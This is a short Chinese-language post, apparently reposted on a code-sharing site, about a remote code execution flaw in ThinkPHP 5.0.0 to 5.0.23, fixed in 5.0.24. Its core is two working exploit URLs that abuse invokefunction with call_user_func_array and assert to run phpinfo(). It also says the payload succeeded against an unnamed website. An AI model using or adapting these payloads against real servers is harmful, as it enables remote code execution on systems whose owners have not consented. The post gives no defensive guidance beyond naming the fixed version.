ThinkPHP 5.0.0-5.0.23 遠程代碼執行漏洞利用


漏洞影響范圍: 5.0.0-5.0.23

官方已在5.0.24版本修復該漏洞。
測試Payload:

/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

以某個網站為例,可以看到成功執行phpinfo()函數。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM